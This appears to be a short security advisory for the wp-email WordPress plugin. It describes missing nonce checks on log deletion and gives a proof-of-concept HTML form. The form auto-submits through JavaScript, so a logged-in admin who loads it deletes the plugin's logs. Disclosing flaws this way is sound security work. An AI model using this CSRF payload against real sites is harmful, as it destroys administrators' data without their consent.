The plugin does not protect its log deletion functionality with nonce checks, allowing attacker to make a logged in admin delete logs via a CSRF attack
<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-email/email-manager.php" method="POST">
<input type="text" name="delete_logs_yes" value="yes">
<input type="text" name="delete_logs" value="Delete">
</form>
<script>
document.getElementById("test").submit();
</script>